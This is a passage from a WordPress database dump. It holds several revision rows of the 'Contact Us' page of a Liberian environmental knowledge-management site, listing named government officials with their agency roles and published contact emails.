target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\nManager, ESIA\nDepartment of Compliance and Enforcement\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:27:32','2021-01-22 10:27:32','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3387,42,'2021-01-22 10:27:32','2021-01-22 10:27:32','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\nManager, ESIA\nDepartment of Compliance and Enforcement\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:27:32','2021-01-22 10:27:32','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3388,42,'2021-01-22 10:27:32','2021-01-22 10:27:32','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\nManager, ESIA\nDepartment of Compliance and Enforcement\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:27:32','2021-01-22 10:27:32','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3389,42,'2021-01-22 10:29:17','2021-01-22 10:29:17','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a 